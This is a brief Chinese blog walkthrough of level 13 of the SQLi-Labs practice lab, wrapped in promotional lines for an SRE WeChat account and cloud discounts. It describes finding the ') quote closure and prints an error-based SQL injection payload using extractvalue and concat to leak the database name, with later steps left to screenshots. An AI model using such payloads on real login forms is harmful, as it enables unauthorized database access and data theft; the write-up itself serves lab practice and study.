(1)检测闭合方式

SQLI DUMB SERIES-13 随笔 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

通过 ') 闭合。

(2)尝试输入 admin')# 无回显。尝试报错注入,

爆表payload:

admin') and extractvalue(1,concat(0x7e,(select database())))  and ('

SQLI DUMB SERIES-13 随笔 第2张

爆表名

SQLI DUMB SERIES-13 随笔 第3张

爆users表的列

SQLI DUMB SERIES-13 随笔 第4张

其他均与12关相同。

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄